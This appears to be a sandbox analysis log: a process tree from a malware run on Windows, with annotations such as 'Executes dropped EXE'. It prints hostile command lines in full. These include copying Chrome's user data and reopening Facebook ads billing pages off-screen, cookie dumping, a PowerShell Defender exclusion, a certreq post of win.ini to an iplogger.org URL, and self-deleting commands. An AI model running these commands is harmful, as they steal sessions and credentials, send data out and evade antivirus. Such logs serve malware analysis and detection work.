"C:\Users\Admin\AppData\Local\Temp\is-JOQ3D.tmp\PictureLAb.exe" /Verysilent
12⤵
PID:16980

C:\Users\Admin\AppData\Local\Temp\is-GKGLQ.tmp\PictureLAb.tmp
"C:\Users\Admin\AppData\Local\Temp\is-GKGLQ.tmp\PictureLAb.tmp" /SL5="$4078C,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-JOQ3D.tmp\PictureLAb.exe" /Verysilent
13⤵
PID:16664

C:\Users\Admin\AppData\Local\Temp\is-3G22L.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-3G22L.tmp\Setup.exe" /VERYSILENT
14⤵
PID:5168

C:\Users\Admin\AppData\Local\Temp\is-FSOUJ.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-FSOUJ.tmp\Setup.tmp" /SL5="$20B1A,298255,214528,C:\Users\Admin\AppData\Local\Temp\is-3G22L.tmp\Setup.exe" /VERYSILENT
15⤵
PID:18732

C:\Users\Admin\AppData\Local\Temp\is-09BAO.tmp\def.exe
"C:\Users\Admin\AppData\Local\Temp\is-09BAO.tmp\def.exe" /S /UID=lab214
16⤵
PID:19344

C:\Users\Admin\AppData\Local\Temp\88-dd36a-cec-43cbd-cd24c4453289e\Lihokaewegi.exe
"C:\Users\Admin\AppData\Local\Temp\88-dd36a-cec-43cbd-cd24c4453289e\Lihokaewegi.exe"
17⤵
PID:11260

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\n35hwcqd.4lz\askinstall18.exe & exit
18⤵
PID:19936

C:\Users\Admin\AppData\Local\Temp\n35hwcqd.4lz\askinstall18.exe
C:\Users\Admin\AppData\Local\Temp\n35hwcqd.4lz\askinstall18.exe
19⤵
PID:13980

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
20⤵
PID:17268

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
21⤵
- Kills process with taskkill
PID:18748

C:\Windows\SysWOW64\xcopy.exe
xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\mfhsghshee99\" /s /e /y
20⤵
PID:17652

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/
20⤵
PID:17600

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\mfhsghshee99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\mfhsghshee99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\mfhsghshee99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x23a875b6e00,0x23a875b6e10,0x23a875b6e20
21⤵
PID:14464

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1592,18169083904636967268,16498331650059253259,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --mojo-platform-channel-handle=1636 /prefetch:8
21⤵
PID:19856

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\m41cyzev.udk\customer4.exe & exit
18⤵
PID:13988

C:\Users\Admin\AppData\Local\Temp\m41cyzev.udk\customer4.exe
C:\Users\Admin\AppData\Local\Temp\m41cyzev.udk\customer4.exe
19⤵
PID:6940

C:\Users\Admin\AppData\Local\Temp\RarSFX6\main.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX6\main.exe"
20⤵
PID:19064

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xikztcvx.4ai\md7_7dfj.exe & exit
18⤵
PID:16156

C:\Users\Admin\AppData\Local\Temp\xikztcvx.4ai\md7_7dfj.exe
C:\Users\Admin\AppData\Local\Temp\xikztcvx.4ai\md7_7dfj.exe
19⤵
PID:17820

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\laif0w1e.zr4\GcleanerWW.exe /mixone & exit
18⤵
PID:17656

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pi2jp2yp.wgz\privacytools5.exe & exit
18⤵
PID:18856

C:\Users\Admin\AppData\Local\Temp\pi2jp2yp.wgz\privacytools5.exe
C:\Users\Admin\AppData\Local\Temp\pi2jp2yp.wgz\privacytools5.exe
19⤵
PID:14584

C:\Users\Admin\AppData\Local\Temp\pi2jp2yp.wgz\privacytools5.exe
C:\Users\Admin\AppData\Local\Temp\pi2jp2yp.wgz\privacytools5.exe
20⤵
PID:10300

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\c4xg4ijj.kie\setup.exe /8-2222 & exit
18⤵
PID:5228

C:\Users\Admin\AppData\Local\Temp\c4xg4ijj.kie\setup.exe
C:\Users\Admin\AppData\Local\Temp\c4xg4ijj.kie\setup.exe /8-2222
19⤵
PID:19480

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Quiet-Water"
20⤵
PID:4728

C:\Program Files (x86)\Quiet-Water\7za.exe
"C:\Program Files (x86)\Quiet-Water\7za.exe" e -p154.61.71.51 winamp-plugins.7z
20⤵
PID:17740

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Quiet-Water\setup.exe" -map "C:\Program Files (x86)\Quiet-Water\WinmonProcessMonitor.sys""
20⤵
PID:7808

C:\Program Files (x86)\Quiet-Water\setup.exe
"C:\Program Files (x86)\Quiet-Water\setup.exe" -map "C:\Program Files (x86)\Quiet-Water\WinmonProcessMonitor.sys"
21⤵
PID:7488

C:\Program Files (x86)\Quiet-Water\7za.exe
"C:\Program Files (x86)\Quiet-Water\7za.exe" e -p154.61.71.51 winamp.7z
20⤵
PID:17236

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\losse4pm.shu\MultitimerFour.exe & exit
18⤵
PID:10432

C:\Users\Admin\AppData\Local\Temp\losse4pm.shu\MultitimerFour.exe
C:\Users\Admin\AppData\Local\Temp\losse4pm.shu\MultitimerFour.exe
19⤵
PID:7552

C:\Users\Admin\AppData\Local\Temp\YZ3FM6IR2N\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\YZ3FM6IR2N\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 104
20⤵
PID:3816

C:\Users\Admin\AppData\Local\Temp\YZ3FM6IR2N\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\YZ3FM6IR2N\multitimer.exe" 1 3.1615302434.60478f2267d87 104
21⤵
PID:15112

C:\Users\Admin\AppData\Local\Temp\YZ3FM6IR2N\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\YZ3FM6IR2N\multitimer.exe" 2 3.1615302434.60478f2267d87
22⤵
PID:9632

C:\Users\Admin\AppData\Local\Temp\by51cf3wt00\Setup3310.exe
"C:\Users\Admin\AppData\Local\Temp\by51cf3wt00\Setup3310.exe" /Verysilent /subid=577
23⤵
PID:7412

C:\Users\Admin\AppData\Local\Temp\is-7M9EF.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-7M9EF.tmp\Setup3310.tmp" /SL5="$40BE4,802346,56832,C:\Users\Admin\AppData\Local\Temp\by51cf3wt00\Setup3310.exe" /Verysilent /subid=577
24⤵
PID:12688

C:\Users\Admin\AppData\Local\Temp\is-5T96P.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-5T96P.tmp\Setup.exe" /Verysilent
25⤵
PID:7248

C:\Users\Admin\AppData\Local\Temp\is-QCPU8.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-QCPU8.tmp\Setup.tmp" /SL5="$608E4,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-5T96P.tmp\Setup.exe" /Verysilent
26⤵
PID:19472

C:\Users\Admin\AppData\Local\Temp\is-38UGK.tmp\PictureLAb.exe
"C:\Users\Admin\AppData\Local\Temp\is-38UGK.tmp\PictureLAb.exe" /Verysilent
27⤵
PID:7424

C:\Users\Admin\AppData\Local\Temp\is-4CECR.tmp\PictureLAb.tmp
"C:\Users\Admin\AppData\Local\Temp\is-4CECR.tmp\PictureLAb.tmp" /SL5="$70AAA,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-38UGK.tmp\PictureLAb.exe" /Verysilent
28⤵
PID:10776

C:\Users\Admin\AppData\Local\Temp\is-AEOUF.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-AEOUF.tmp\Setup.exe" /VERYSILENT
29⤵
PID:2240

C:\Users\Admin\AppData\Local\Temp\is-O6PR4.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-O6PR4.tmp\Setup.tmp" /SL5="$F050A,298255,214528,C:\Users\Admin\AppData\Local\Temp\is-AEOUF.tmp\Setup.exe" /VERYSILENT
30⤵
PID:16932

C:\Users\Admin\AppData\Local\Temp\is-NGN33.tmp\def.exe
"C:\Users\Admin\AppData\Local\Temp\is-NGN33.tmp\def.exe" /S /UID=lab214
31⤵
PID:8384

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
dw20.exe -x -s 1300
32⤵
PID:5964

C:\Users\Admin\AppData\Local\Temp\is-38UGK.tmp\Delta.exe
"C:\Users\Admin\AppData\Local\Temp\is-38UGK.tmp\Delta.exe" /Verysilent
27⤵
PID:13448

C:\Users\Admin\AppData\Local\Temp\is-E432A.tmp\Delta.tmp
"C:\Users\Admin\AppData\Local\Temp\is-E432A.tmp\Delta.tmp" /SL5="$40CA6,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-38UGK.tmp\Delta.exe" /Verysilent
28⤵
PID:10956

C:\Users\Admin\AppData\Local\Temp\is-LF2C9.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-LF2C9.tmp\Setup.exe" /VERYSILENT
29⤵
PID:2216

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-LF2C9.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit
30⤵
PID:9684

C:\Windows\SysWOW64\taskkill.exe
taskkill /im Setup.exe /f
31⤵
- Kills process with taskkill
PID:15532

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
31⤵
- Delays execution with timeout.exe
PID:17376

C:\Users\Admin\AppData\Local\Temp\is-38UGK.tmp\zznote.exe
"C:\Users\Admin\AppData\Local\Temp\is-38UGK.tmp\zznote.exe" /Verysilent
27⤵
PID:14160

C:\Users\Admin\AppData\Local\Temp\is-OS1UJ.tmp\zznote.tmp
"C:\Users\Admin\AppData\Local\Temp\is-OS1UJ.tmp\zznote.tmp" /SL5="$50BCC,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-38UGK.tmp\zznote.exe" /Verysilent
28⤵
PID:17764

C:\Users\Admin\AppData\Local\Temp\is-PPEUU.tmp\jg4_4jaa.exe
"C:\Users\Admin\AppData\Local\Temp\is-PPEUU.tmp\jg4_4jaa.exe" /silent
29⤵
PID:9796

C:\Users\Admin\AppData\Local\Temp\is-38UGK.tmp\hjjgaa.exe
"C:\Users\Admin\AppData\Local\Temp\is-38UGK.tmp\hjjgaa.exe" /Verysilent
27⤵
PID:12924

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
28⤵
PID:14540

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
28⤵
PID:10588

C:\Users\Admin\AppData\Local\Temp\fwpqfftledr\askinstall24.exe
"C:\Users\Admin\AppData\Local\Temp\fwpqfftledr\askinstall24.exe"
23⤵
PID:3364

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
24⤵
PID:14356

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
25⤵
- Kills process with taskkill
PID:13808

C:\Windows\SysWOW64\xcopy.exe
xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\" /s /e /y
24⤵
PID:11880

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/
24⤵
PID:11232

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x19bd0ca6e00,0x19bd0ca6e10,0x19bd0ca6e20
25⤵
PID:18512

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1620,11740560474501628205,1128483353135607492,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=1628 /prefetch:8
25⤵
PID:5680

C:\Users\Admin\AppData\Local\Temp\0pm1i24tkgq\vict.exe
"C:\Users\Admin\AppData\Local\Temp\0pm1i24tkgq\vict.exe" /VERYSILENT /id=535
23⤵
PID:19388

C:\Users\Admin\AppData\Local\Temp\is-CSEBM.tmp\vict.tmp
"C:\Users\Admin\AppData\Local\Temp\is-CSEBM.tmp\vict.tmp" /SL5="$40AF0,870426,780800,C:\Users\Admin\AppData\Local\Temp\0pm1i24tkgq\vict.exe" /VERYSILENT /id=535
24⤵
PID:8680

C:\Users\Admin\AppData\Local\Temp\is-M2M3V.tmp\wimapi.exe
"C:\Users\Admin\AppData\Local\Temp\is-M2M3V.tmp\wimapi.exe" 535
25⤵
PID:18940

C:\Users\Admin\AppData\Local\Temp\rqjufbwknct\chashepro3.exe
"C:\Users\Admin\AppData\Local\Temp\rqjufbwknct\chashepro3.exe" /VERYSILENT
23⤵
PID:6860

C:\Users\Admin\AppData\Local\Temp\is-HNK10.tmp\chashepro3.tmp
"C:\Users\Admin\AppData\Local\Temp\is-HNK10.tmp\chashepro3.tmp" /SL5="$20C4C,1478410,58368,C:\Users\Admin\AppData\Local\Temp\rqjufbwknct\chashepro3.exe" /VERYSILENT
24⤵
PID:9224

C:\Users\Admin\AppData\Local\Temp\ecpfm2bj42d\2b0gvtpzdne.exe
"C:\Users\Admin\AppData\Local\Temp\ecpfm2bj42d\2b0gvtpzdne.exe" /ustwo INSTALL
23⤵
PID:7336

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "2b0gvtpzdne.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\ecpfm2bj42d\2b0gvtpzdne.exe" & exit
24⤵
PID:4600

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "2b0gvtpzdne.exe" /f
25⤵
- Kills process with taskkill
PID:10252

C:\Users\Admin\AppData\Local\Temp\is-JOQ3D.tmp\Delta.exe
"C:\Users\Admin\AppData\Local\Temp\is-JOQ3D.tmp\Delta.exe" /Verysilent
12⤵
PID:4864

C:\Users\Admin\AppData\Local\Temp\is-5SCLO.tmp\Delta.tmp
"C:\Users\Admin\AppData\Local\Temp\is-5SCLO.tmp\Delta.tmp" /SL5="$5078C,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-JOQ3D.tmp\Delta.exe" /Verysilent
13⤵
PID:652

C:\Users\Admin\AppData\Local\Temp\is-MD79U.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-MD79U.tmp\Setup.exe" /VERYSILENT
14⤵
PID:9124

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-MD79U.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit
15⤵
PID:11316

C:\Windows\SysWOW64\taskkill.exe
taskkill /im Setup.exe /f
16⤵
- Kills process with taskkill
PID:9512

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
16⤵
- Delays execution with timeout.exe
PID:12512

C:\Users\Admin\AppData\Local\Temp\is-JOQ3D.tmp\zznote.exe
"C:\Users\Admin\AppData\Local\Temp\is-JOQ3D.tmp\zznote.exe" /Verysilent
12⤵
PID:9352

C:\Users\Admin\AppData\Local\Temp\is-6TVUK.tmp\zznote.tmp
"C:\Users\Admin\AppData\Local\Temp\is-6TVUK.tmp\zznote.tmp" /SL5="$309B8,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-JOQ3D.tmp\zznote.exe" /Verysilent
13⤵
PID:12044

C:\Users\Admin\AppData\Local\Temp\is-5VCMG.tmp\jg4_4jaa.exe
"C:\Users\Admin\AppData\Local\Temp\is-5VCMG.tmp\jg4_4jaa.exe" /silent
14⤵
PID:16456

C:\Users\Admin\AppData\Local\Temp\is-JOQ3D.tmp\hjjgaa.exe
"C:\Users\Admin\AppData\Local\Temp\is-JOQ3D.tmp\hjjgaa.exe" /Verysilent
12⤵
PID:15896

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
13⤵
PID:19488

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
13⤵
PID:12056

C:\Users\Admin\AppData\Local\Temp\x5ng50evihj\vict.exe
"C:\Users\Admin\AppData\Local\Temp\x5ng50evihj\vict.exe" /VERYSILENT /id=535
8⤵
PID:10616

C:\Users\Admin\AppData\Local\Temp\is-6BQBB.tmp\vict.tmp
"C:\Users\Admin\AppData\Local\Temp\is-6BQBB.tmp\vict.tmp" /SL5="$2095A,870426,780800,C:\Users\Admin\AppData\Local\Temp\x5ng50evihj\vict.exe" /VERYSILENT /id=535
9⤵
PID:11568

C:\Users\Admin\AppData\Local\Temp\is-EQTN2.tmp\wimapi.exe
"C:\Users\Admin\AppData\Local\Temp\is-EQTN2.tmp\wimapi.exe" 535
10⤵
PID:12432

C:\Users\Admin\AppData\Local\Temp\dfphyh4rqi1\crfun3dr3yl.exe
"C:\Users\Admin\AppData\Local\Temp\dfphyh4rqi1\crfun3dr3yl.exe" /ustwo INSTALL
8⤵
PID:11344

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "crfun3dr3yl.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\dfphyh4rqi1\crfun3dr3yl.exe" & exit
9⤵
PID:14380

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "crfun3dr3yl.exe" /f
10⤵
- Kills process with taskkill
PID:14524

C:\Users\Admin\AppData\Local\Temp\0b0gn1flwvn\chashepro3.exe
"C:\Users\Admin\AppData\Local\Temp\0b0gn1flwvn\chashepro3.exe" /VERYSILENT
8⤵
PID:10556

C:\Users\Admin\AppData\Local\Temp\is-JQ898.tmp\chashepro3.tmp
"C:\Users\Admin\AppData\Local\Temp\is-JQ898.tmp\chashepro3.tmp" /SL5="$1097E,1478410,58368,C:\Users\Admin\AppData\Local\Temp\0b0gn1flwvn\chashepro3.exe" /VERYSILENT
9⤵
PID:11584

C:\Users\Admin\AppData\Local\Temp\415kpf4mun0\askinstall24.exe
"C:\Users\Admin\AppData\Local\Temp\415kpf4mun0\askinstall24.exe"
8⤵
PID:6676

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
9⤵
PID:12672

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
10⤵
- Kills process with taskkill
PID:13116

C:\Windows\SysWOW64\xcopy.exe
xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\" /s /e /y
9⤵
PID:13620

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/
9⤵
PID:15340

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x12982e96e00,0x12982e96e10,0x12982e96e20
10⤵
PID:15336

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1616,7416789427066162007,8722099715085880538,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=1632 /prefetch:8
10⤵
PID:18180

C:\Users\Admin\AppData\Local\Temp\4m1na0av413\askinstall24.exe
"C:\Users\Admin\AppData\Local\Temp\4m1na0av413\askinstall24.exe"
8⤵
PID:8528

C:\Users\Admin\AppData\Local\Temp\jpew32flsvc\vict.exe
"C:\Users\Admin\AppData\Local\Temp\jpew32flsvc\vict.exe" /VERYSILENT /id=535
8⤵
PID:5156

C:\Users\Admin\AppData\Local\Temp\qr2vzt11sni\Setup3310.exe
"C:\Users\Admin\AppData\Local\Temp\qr2vzt11sni\Setup3310.exe" /Verysilent /subid=577
8⤵
PID:18580

C:\Users\Admin\AppData\Local\Temp\is-DGEM8.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-DGEM8.tmp\Setup3310.tmp" /SL5="$10E8A,802346,56832,C:\Users\Admin\AppData\Local\Temp\qr2vzt11sni\Setup3310.exe" /Verysilent /subid=577
9⤵
PID:10084

C:\Users\Admin\AppData\Local\Temp\ib4iobin2wa\2bfedr1fpnx.exe
"C:\Users\Admin\AppData\Local\Temp\ib4iobin2wa\2bfedr1fpnx.exe" /ustwo INSTALL
8⤵
PID:12652

C:\Users\Admin\AppData\Local\Temp\4eu5rygkl2b\chashepro3.exe
"C:\Users\Admin\AppData\Local\Temp\4eu5rygkl2b\chashepro3.exe" /VERYSILENT
8⤵
PID:20392

C:\Users\Admin\AppData\Local\Temp\RarSFX4\md2_2efs.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX4\md2_2efs.exe"
4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:2668

C:\Users\Admin\AppData\Local\Temp\RarSFX4\file.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX4\file.exe"
4⤵
- Executes dropped EXE
PID:3888

C:\Users\Admin\AppData\Roaming\C1FD.tmp.exe
"C:\Users\Admin\AppData\Roaming\C1FD.tmp.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:420

C:\Users\Admin\AppData\Roaming\C1FD.tmp.exe
"C:\Users\Admin\AppData\Roaming\C1FD.tmp.exe"
6⤵
- Checks processor information in registry
PID:5352

C:\Users\Admin\AppData\Roaming\C71F.tmp.exe
"C:\Users\Admin\AppData\Roaming\C71F.tmp.exe"
5⤵
- Executes dropped EXE
PID:2284

C:\Users\Admin\AppData\Roaming\C71F.tmp.exe
"{path}"
6⤵
PID:7520

C:\Users\Admin\AppData\Local\Temp\RarSFX4\BTRSetp.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX4\BTRSetp.exe"
4⤵
PID:5532

C:\ProgramData\2071083.22
"C:\ProgramData\2071083.22"
5⤵
PID:3188

C:\ProgramData\1757459.19
"C:\ProgramData\1757459.19"
5⤵
PID:5640

C:\ProgramData\Windows Host\Windows Host.exe
"C:\ProgramData\Windows Host\Windows Host.exe"
6⤵
PID:5652

C:\ProgramData\4925508.54
"C:\ProgramData\4925508.54"
5⤵
PID:2312

C:\Users\Admin\AppData\Local\Temp\RarSFX4\gcttt.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX4\gcttt.exe"
4⤵
PID:5660

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
PID:4632

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
PID:7432

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:1900

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 22D75E862DEE7458B5ECB8CF03C1E53A C
2⤵
- Loads dropped DLL
PID:1864

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 243C92721962C9E70185799EBDBAB245 C
2⤵
- Loads dropped DLL
PID:812

C:\Windows\system32\srtasks.exe
C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
2⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:2240

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:1424

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
1⤵
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
PID:644

C:\Users\Admin\AppData\Local\Temp\is-DJU7J.tmp\chashepro3.tmp
"C:\Users\Admin\AppData\Local\Temp\is-DJU7J.tmp\chashepro3.tmp" /SL5="$20494,1478410,58368,C:\Users\Admin\AppData\Local\Temp\kfbgda1bykf\chashepro3.exe" /VERYSILENT
1⤵
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:5132

C:\Program Files (x86)\JCleaner\mex.exe
"C:\Program Files (x86)\JCleaner\mex.exe"
2⤵
PID:5752

C:\Program Files (x86)\JCleaner\mex.exe
"{path}"
3⤵
PID:6916

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Program Files (x86)\JCleaner\mex.exe"
4⤵
PID:5632

C:\Windows\SysWOW64\timeout.exe
timeout /T 10 /NOBREAK
5⤵
- Delays execution with timeout.exe
PID:6136

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1EaGq7"
2⤵
- Drops file in System32 directory
PID:5744

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c "start https://iplogger.org/1EaGq7"
2⤵
PID:5736

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c certreq -post -config https://iplogger.org/1EaGq7 %windir%\\win.ini %temp%\\2 & del %temp%\\2
2⤵
PID:5728

C:\Windows\SysWOW64\certreq.exe
certreq -post -config https://iplogger.org/1EaGq7 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\2
3⤵
PID:6120

C:\Program Files (x86)\JCleaner\Venita.exe
"C:\Program Files (x86)\JCleaner\Venita.exe"
2⤵
PID:5720

C:\Program Files (x86)\JCleaner\Venita.exe
"{path}"
3⤵
PID:5348

C:\Program Files (x86)\JCleaner\Venita.exe
"{path}"
3⤵
PID:3628

